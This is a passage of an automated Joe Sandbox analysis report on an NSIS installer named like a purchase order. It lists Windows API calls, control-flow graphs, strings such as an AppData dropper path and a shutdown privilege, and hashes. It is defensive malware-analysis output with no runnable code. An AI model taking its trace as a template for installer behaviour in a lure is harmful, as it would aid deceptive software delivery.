403b22-403b2b DeleteFileW 129->132 131->115 133 403b4e 131->133 132->131 135 403b2d-403b3f call 405dae 132->135 133->62 135->118 135->131 146 403b94-403b9e 136->146 147 403bd8-403be4 CloseHandle 136->147 137->62 146->137 148 403ba0-403ba8 call 4069ff 146->148 147->137 148->118 148->137
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403688
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004036B3
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036C6
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040375F
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040379C
                                                  • OleInitialize.OLE32(00000000), ref: 004037A3
                                                  • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037C2
                                                  • GetCommandLineW.KERNEL32(Caecias Setup,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037D7
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe",00000020,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe",00000000,?,00000008,0000000A,0000000C), ref: 00403810
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403948
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403965
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403979
                                                  • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403981
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403992
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040399A
                                                  • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004039AE
                                                  • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A87
                                                    • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00000400,004037D7,Caecias Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                  • wsprintfW.USER32 ref: 00403AE4
                                                  • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user~1\AppData\Local\Temp\), ref: 00403B17
                                                  • DeleteFileW.KERNEL32(0042C800), ref: 00403B23
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 00403B51
                                                    • Part of subcall function 00406462: MoveFileExW.KERNEL32(?,?,00000005,00405F60,?,00000000,000000F1,?,?,?,?,?), ref: 0040646C
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe,0042C800,00000001,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403B67
                                                    • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                    • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                    • Part of subcall function 004069FF: FindFirstFileW.KERNELBASE(771B3420,00425F98,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,004060C2,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0), ref: 00406A0A
                                                    • Part of subcall function 004069FF: FindClose.KERNEL32(00000000), ref: 00406A16
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BB5
                                                  • ExitProcess.KERNEL32 ref: 00403BD2
                                                  • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BD9
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BF5
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BFC
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C11
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C34
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C59
                                                  • ExitProcess.KERNEL32 ref: 00403C7C
                                                    • Part of subcall function 00405C50: CreateDirectoryW.KERNELBASE(?,00000000,00403658,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Premolder\Mokl$C:\Users\user\AppData\Roaming\Premolder\Mokl$C:\Users\user\Desktop$C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe$Caecias Setup$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                  • API String ID: 1813718867-1863696996
                                                  • Opcode ID: 3b0ca163a138ceeb4dc0e43934e69722792c29fddf94c25b6d98525d7c12ca17
                                                  • Instruction ID: 48c25345ab5c6186891d52a8fabce3a967a0262862fdddf466c19d710b4311b7
                                                  • Opcode Fuzzy Hash: 3b0ca163a138ceeb4dc0e43934e69722792c29fddf94c25b6d98525d7c12ca17
                                                  • Instruction Fuzzy Hash: EDF1E571604301AAD720AF659D05B2B7EE8EB8570AF10483EF581B22D1DB7CDA45CB6E
                                                  APIs
                                                    • Part of subcall function 743312BB: GlobalAlloc.KERNEL32(00000040,?,743312DB,?,7433137F,00000019,743311CA,-000000A0), ref: 743312C5
                                                  • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 74331D2D
                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 74331D75
                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 74331D7F
                                                  • GlobalFree.KERNEL32(00000000), ref: 74331D92
                                                  • GlobalFree.KERNEL32(?), ref: 74331E74
                                                  • GlobalFree.KERNEL32(?), ref: 74331E79
                                                  • GlobalFree.KERNEL32(?), ref: 74331E7E
                                                  • GlobalFree.KERNEL32(00000000), ref: 74332068
                                                  • lstrcpyW.KERNEL32(?,?), ref: 74332222
                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 743322A1
                                                  • LoadLibraryW.KERNEL32(00000008), ref: 743322B2
                                                  • GetProcAddress.KERNEL32(?,?), ref: 7433230C
                                                  • lstrlenW.KERNEL32(00000808), ref: 74332326
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2450202966.0000000074331000.00000020.00000001.01000000.00000004.sdmp, Offset: 74330000, based on PE: true
                                                  • Associated: 00000000.00000002.2450137817.0000000074330000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450226719.0000000074334000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2450276795.0000000074336000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_74330000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: 8edc344b64cd285615dca8466acc35d77e1297e18619cab9b1b678ead9cd0e77
                                                  • Instruction ID: a3770c6d36763d662988a9fd16985944fa40f3985241ecd2d38bc5e446556777
                                                  • Opcode Fuzzy Hash: 8edc344b64cd285615dca8466acc35d77e1297e18619cab9b1b678ead9cd0e77
                                                  • Instruction Fuzzy Hash: 56228D71E04609DADF11CFA5C980AEEB7B8FF09315F90452EE1AEE2294D7749B81CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 578 405dae-405dd4 call 406079 581 405dd6-405de8 DeleteFileW 578->581 582 405ded-405df4 578->582 585 405f6a-405f6e 581->585 583 405df6-405df8 582->583 584 405e07-405e17 call 4066a2 582->584 586 405f18-405f1d 583->586 587 405dfe-405e01 583->587 591 405e26-405e27 call 405fbd 584->591 592 405e19-405e24 lstrcatW 584->592 586->585 590 405f1f-405f22 586->590 587->584 587->586 593 405f24-405f2a 590->593 594 405f2c-405f34 call 4069ff 590->594 595 405e2c-405e30 591->595 592->595 593->585 594->585 602 405f36-405f4a call 405f71 call 405d66 594->602 598 405e32-405e3a 595->598 599 405e3c-405e42 lstrcatW 595->599 598->599 601 405e47-405e63 lstrlenW FindFirstFileW 598->601 599->601 603 405e69-405e71 601->603 604 405f0d-405f11 601->604 618 405f62-405f65 call 405727 602->618 619 405f4c-405f4f 602->619 607 405e91-405ea5 call 4066a2 603->607 608 405e73-405e7b 603->608 604->586 606 405f13 604->606 606->586 620 405ea7-405eaf 607->620 621 405ebc-405ec7 call 405d66 607->621 612 405ef0-405f00 FindNextFileW 608->612 613 405e7d-405e85 608->613 612->603 616 405f06-405f07 FindClose 612->616 613->607 617 405e87-405e8f 613->617 616->604 617->607 617->612 618->585 619->593 622 405f51-405f60 call 405727 call 406462 619->622 620->612 623 405eb1-405eba call 405dae 620->623 631 405ee8-405eeb call 405727 621->631 632 405ec9-405ecc 621->632 622->585 623->612 631->612 635 405ee0-405ee6 632->635 636 405ece-405ede call 405727 call 406462 632->636 635->612 636->612
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 00405DD7
                                                  • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 00405E1F
                                                  • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 00405E42
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 00405E48
                                                  • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"), ref: 00405E58
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EF8
                                                  • FindClose.KERNEL32(00000000), ref: 00405F07
                                                  Strings
                                                  • "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe", xrefs: 00405DB7
                                                  • POB, xrefs: 00405E07
                                                  • \*.*, xrefs: 00405E19
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe"$POB$\*.*
                                                  • API String ID: 2035342205-2051337858
                                                  • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                  • Instruction ID: 08bfc2840413863968cf962241dff1eb28b75ffaef7a08e493f25e9a85e6eaf1
                                                  • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                  • Instruction Fuzzy Hash: E341F130800A06A6CB21AB61CD89BBF7278EF45754F14413FF485B11C1DB7C4A82DEAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 849 406dc0-406dc5 850 406e36-406e54 849->850 851 406dc7-406df6 849->851 852 40742c-407441 850->852 853 406df8-406dfb 851->853 854 406dfd-406e01 851->854 855 407443-407459 852->855 856 40745b-407471 852->856 857 406e0d-406e10 853->857 858 406e03-406e07 854->858 859 406e09 854->859 860 407474-40747b 855->860 856->860 861 406e12-406e1b 857->861 862 406e2e-406e31 857->862 858->857 859->857 863 4074a2-4074ae 860->863 864 40747d-407481 860->864 865 406e20-406e2c 861->865 866 406e1d 861->866 867 407003-407021 862->867 875 406c44-406c4d 863->875 868 407630-40763a 864->868 869 407487-40749f 864->869 870 406e96-406ec4 865->870 866->865 872 407023-407037 867->872 873 407039-40704b 867->873 878 407646-407659 868->878 869->863 876 406ee0-406efa 870->876 877 406ec6-406ede 870->877 874 40704e-407058 872->874 873->874 879 40705a 874->879 880 406ffb-407001 874->880 881 406c53 875->881 882 40765b 875->882 883 406efd-406f07 876->883 877->883 884 40765e-407662 878->884 885 406fd6-406fda 879->885 886 40716b-407178 879->886 880->867 891 406f9f-406fa9 880->891 887 406c5a-406c5e 881->887 888 406d9a-406dbb 881->888 889 406cff-406d03 881->889 890 406d6f-406d73 881->890 882->884 892 406f0d 883->892 893 406e7e-406e84 883->893 903 406fe0-406ff8 885->903 904 4075e2-4075ec 885->904 886->875 905 4071c7-4071d6 886->905 887->878 896 406c64-406c71 887->896 888->852 894 406d09-406d22 889->894 895 4075af-4075b9 889->895 897 406d79-406d8d 890->897 898 4075be-4075c8 890->898 899 4075ee-4075f8 891->899 900 406faf-406fd1 891->900 911 406e63-406e7b 892->911 912 4075ca-4075d4 892->912 901 406f37-406f3d 893->901 902 406e8a-406e90 893->902 910 406d25-406d29 894->910 895->878 896->882 909 406c77-406cbd 896->909 913 406d90-406d98 897->913 898->878 899->878 900->886 907 406f9b 901->907 908 406f3f-406f5d 901->908 902->870 902->907 903->880 904->878 905->852 907->891 914 406f75-406f87 908->914 915 406f5f-406f73 908->915 917 406ce5-406ce7 909->917 918 406cbf-406cc3 909->918 910->889 916 406d2b-406d31 910->916 911->893 912->878 913->888 913->890 919 406f8a-406f94 914->919 915->919 924 406d33-406d3a 916->924 925 406d5b-406d6d 916->925 922 406cf5-406cfd 917->922 923 406ce9-406cf3 917->923 920 406cc5-406cc8 GlobalFree 918->920 921 406cce-406cdc GlobalAlloc 918->921 919->901 928 406f96 919->928 920->921 921->882 929 406ce2 921->929 922->910 923->922 923->923 926 406d45-406d55 GlobalAlloc 924->926 927 406d3c-406d3f GlobalFree 924->927 925->913 926->882 926->925 927->926 931 4075d6-4075e0 928->931 932 406f1c-406f34 928->932 929->917 931->878 932->901
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                  • Instruction ID: 2c84522690a72e7b125efbdd79dcce5a6d58b8fc95eff680b6a5e34cc787ad25
                                                  • Opcode Fuzzy Hash: f9c4c7fe21643fbeaf7e138ee869f294de0f5e1fd31501e9972d14a61e44697c
                                                  • Instruction Fuzzy Hash: 5EF17670D04229CBDF28CFA8C8946ADBBB1FF44305F24856ED456BB281D7786A86CF45

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 969 4069ff-406a13 FindFirstFileW 970 406a20 969->970 971 406a15-406a1e FindClose 969->971 972 406a22-406a23 970->972 971->972
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(771B3420,00425F98,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,004060C2,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp,771B3420,?,771B2EE0,00405DCE,?,771B3420,771B2EE0), ref: 00406A0A
                                                  • FindClose.KERNEL32(00000000), ref: 00406A16
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp, xrefs: 004069FF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nszD14F.tmp
                                                  • API String ID: 2295610775-2967713064
                                                  • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                  • Instruction ID: 20279147522b4af1e9b85c80e58242a12c3cc79f3f19e9bc8d226ca4cfbd33e3
                                                  • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                  • Instruction Fuzzy Hash: 9FD012317595205BC640673C6E0C89B7E589F1A3317128A36F06BF21E4D7348C628A9C
                                                  APIs
                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\Premolder\Mokl, xrefs: 0040228E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2415730008.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2415714170.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415746623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415774554.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2415876833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Order NO 000293988494948595850000595995000.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\Premolder\Mokl
                                                  • API String ID: 542301482-3722675925
                                                  • Opcode ID: 0140e218fa6805cd9e9d549b3f46d2fa505c0e185024ac1d7b568c254fc15d58
                                                  • Instruction ID: 6ff6f317fb38c44f87062c5feee8d19efe767a13196ba6052caed3a8697b1732
                                                  • Opcode Fuzzy Hash: 0140e218fa6805cd9e9d549b3f46d2fa505c0e185024ac1d7b568c254fc15d58
                                                  • Instruction Fuzzy Hash: 57410575A00209AFCB00DFE4CA89A9D7BB5FF48318B20457EF505EB2D1DB799981CB54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 151 403d74-403d8c call 406a96 154 403da0-403dd7 call 406570 151->154 155 403d8e-403d9e call 4065e9 151->155 160 403dd9-403dea call 406570 154->160 161 403def-403df5 lstrcatW 154->161 164 403dfa-403e23 call 40404a call 406079 155->164 160->161 161->164 169 403eb5-403ebd call 406079 164->169 170 403e29-403e2e 164->170 176 403ecb-403ef0 LoadImageW 169->176 177 403ebf-403ec6 call 4066df 169->177 170->169 171 403e34-403e5c call 406570 170->171 171->169 178 403e5e-403e62 171->178 180 403f71-403f79 call 40140b 176->180 181 403ef2-403f22 RegisterClassW 176->181 177->176 182 403e74-403e80 lstrlenW 178->182 183 403e64-403e71 call 405f9e 178->183 195 403f83-403f8e call 40404a 180->195 196 403f7b-403f7e 180->196 184 404040 181->184 185 403f28-403f6c SystemParametersInfoW CreateWindowExW 181->185 189 403e82-403e90 lstrcmpiW 182->189 190 403ea8-403eb0 call 405f71 call 4066a2 182->190 183->182 188 404042-404049 184->188 185->180 189->190 194 403e92-403e9c GetFileAttributesW 189->194 190->169 199 403ea2-403ea3 call 405fbd 194->199 200 403e9e-403ea0 194->200 204 403f94-403fae ShowWindow call 406a26 195->204 205 404017-40401f call 4057fa 195->205 196->188 199->190 200->190 200->199 212 403fb0-403fb5 call 406a26 204->212 213 403fba-403fcc GetClassInfoW 204->213 210 404021-404027 205->210 211 404039-40403b call 40140b 205->211 210->196 214 40402d-404034 call 40140b 210->214 211->184 212->213 217 403fe4-404015 DialogBoxParamW call 40140b call 403cc4 213->217 218 403fce-403fde GetClassInfoW RegisterClassW 213->218 214->196 217->188 218->217
                                                  APIs
                                                    • Part of subcall function 00406A96: GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                    • Part of subcall function 00406A96: GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                  • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exe",00008001), ref: 00403DF5
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Premolder\Mokl,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,771B3420), ref: 00403E75
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Premolder\Mokl,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E88
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403E93
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Premolder\Mokl), ref: 00403EDC
                                                    • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                  • RegisterClassW.USER32(00428A00), ref: 00403F19
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F31
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F66
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403F9C
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FC8
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FD5
                                                  • RegisterClassW.USER32(00428A00), ref: 00403FDE
